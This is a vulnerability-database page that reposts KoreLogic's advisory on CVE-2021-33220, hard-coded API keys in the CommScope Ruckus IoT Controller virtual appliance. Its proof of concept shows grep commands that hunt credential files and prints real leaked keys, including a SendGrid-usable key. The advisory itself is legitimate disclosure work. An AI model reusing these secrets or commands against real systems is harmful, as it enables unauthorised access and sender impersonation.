华域联盟 漏洞资讯 CommScope Ruckus IoT Controller 信任管理问题漏洞

CommScope Ruckus IoT Controller 信任管理问题漏洞

CommScope Ruckus IoT Controller 信任管理问题漏洞

漏洞ID 2458155 漏洞类型 信任管理问题
发布时间 2021-05-27 更新时间 2021-07-08
CVE编号 CVE-2021-33220 CNNVD-ID CNNVD-202105-1784
漏洞平台 N/A CVSS评分 N/A


Commscope CommScope Ruckus IoT Controller是美国康普(Commscope)公司的一款物联网控制器。与SmartZone控制器集成的虚拟控制器,可为非Wi-Fi设备执行连接,设备和安全管理功能。 CommScope Ruckus IoT Controller 版本及之前版本中存在信任管理问题漏洞,该漏洞源于OVA 映像中存在API密钥,并且会暴漏给挂载文件系统的用户。攻击者可通过该漏洞给获得敏感信息。
KL-001-2021-002: CommScope Ruckus IoT Controller Hard-coded API Keys Exposed

Title: CommScope Ruckus IoT Controller Hard-coded API Keys Exposed
Advisory ID: KL-001-2021-002
Publication Date: 2021.05.26
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2021-002.txt

1. Vulnerability Details

     Affected Vendor: CommScope
     Affected Product: Ruckus IoT Controller
     Affected Version: and earlier
     Platform: Linux
     CWE Classification: CWE-798: Use of Hard-coded Credentials
     CVE ID: CVE-2021-33220

2. Vulnerability Description

     API keys for CommScope Ruckus are included in the IoT
     Controller OVA image, and are exposed to attackers who mount
     the filesystem.

3. Technical Description

     Ruckus vRIoT server software is available from the software
     library at: https://support.ruckuswireless.com/software/

     Once the OVA is imported into VirtualBox, a VMDK file is
     created. The VMDK file can be mounted and the directory
     structure and its contents can be perused. The virtual appliance
     contains clear text API keys that are hard-coded into the
     web application code. The API keys can be abused to gain
     information about deployed assets and send email via SendGrid
     as Commscope/Ruckus. While the AWS SECRET_KEY is exposed,
     an ACCESS_KEY is not.

4. Mitigation and Remediation Recommendation

     The vendor has released an updated firmware ( which
     remediates the described vulnerability. Firmware and release
     notes are available at:


5. Credit

     This vulnerability was discovered by Jim Becher (@jimbecher)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2021.03.30 - KoreLogic submits vulnerability details to
     2021.03.30 - CommScope acknowledges receipt and the intention
                  to investigate.
     2021.04.06 - CommScope notifies KoreLogic that this issue,
                  along with several others reported by KoreLogic,
                  will require more than the standard 45 business
                  day remediation timeline.
     2021.04.06 - KoreLogic agrees to extend disclosure embargo if
     2021.04.30 - CommScope informs KoreLogic that remediation for
                  this vulnerability will be available inside of the
                  standard 45 business day timeline. Requests
                  KoreLogic acquire CVE number for this
     2021.05.14 - 30 business days have elapsed since the
                  vulnerability was reported to CommScope.
     2021.05.17 - CommScope notifies KoreLogic that the patched
                  version of the firmware will be available the week
                  of 2021.05.24.
     2021.05.19 - KoreLogic requests CVE from MITRE.
     2021.05.19 - MITRE issues CVE-2021-33220.
     2021.05.25 - CommScope releases firmware and associated
     2021.05.26 - KoreLogic public disclosure.

7. Proof of Concept

     With the VMDK file mounted at the current working directory:
     root@vriot:/# grep -R 'KIO_API_KEY' /VRIOT/ 2>/dev/null
     ./VRIOT/backend/settings/defaults.py:KIO_API_KEY = os.environ.get("KIO_API_KEY", "wxtPbzgNNWFlfBqhDfEDoZkQUxtnhWTq")

     $ egrep -r 'SECRET_KEY|ACCESS_KEY' ./VRIOT/*
     ./VRIOT/authServer/app/baseapp/settings.py:SECRET_KEY = 'db$04-yk#-3&=54s78d-tvu!+e3#621kj9s!3g$x3t^@m1m6#i'
     ./VRIOT/backend/settings/settings.py:SECRET_KEY = '%u9-#a6eo0!ukif-+kcg3=gc-zlh8o3@)rz@!-74(g*xa0c#bb'
     Binary file ./VRIOT/backend/lora/lorawan1.6.0.0.tar matches
     Binary file ./VRIOT/ops/scripts/image_push.pyc matches
     ./VRIOT/ops/sqlite_modules/aws4/README.md:// or it can get credentials from process.env.AWS_ACCESS_KEY_ID, etc
     ./VRIOT/ops/sqlite_modules/aws4/README.md:export AWS_ACCESS_KEY_ID="<your-access-key-id>"
     ./VRIOT/ops/sqlite_modules/aws4/README.md:export AWS_SECRET_ACCESS_KEY="<your-secret-access-key>"
     ./VRIOT/ops/sqlite_modules/aws4/README.md:(will also use `AWS_ACCESS_KEY` and `AWS_SECRET_KEY` if available)
     ./VRIOT/ops/sqlite_modules/aws4/aws4.js:    accessKeyId: env.AWS_ACCESS_KEY_ID || env.AWS_ACCESS_KEY,
     ./VRIOT/ops/sqlite_modules/aws4/aws4.js:    secretAccessKey: env.AWS_SECRET_ACCESS_KEY || env.AWS_SECRET_KEY,

     $ more ./VRIOT/authServer# more app/baseapp/settings.py
     # Email server settings.
     EMAIL_HOST = 'smtp.sendgrid.net'
     EMAIL_HOST_USER = 'apikey'
     EMAIL_PORT = 587
     EMAIL_USE_TLS = True

     Per https://sendgrid.com/docs/API_Reference/SMTP_API/integrating_with_the_smtp_api.html,
     the SendGrid password identified above is actually an API key, which can be
     used with the 'apikey' user to send email through the SendGrid platform as
     Commscope Ruckus.

The contents of this advisory are copyright(c) 2021
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.

Our public vulnerability disclosure policy is available at:




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作者: sterben





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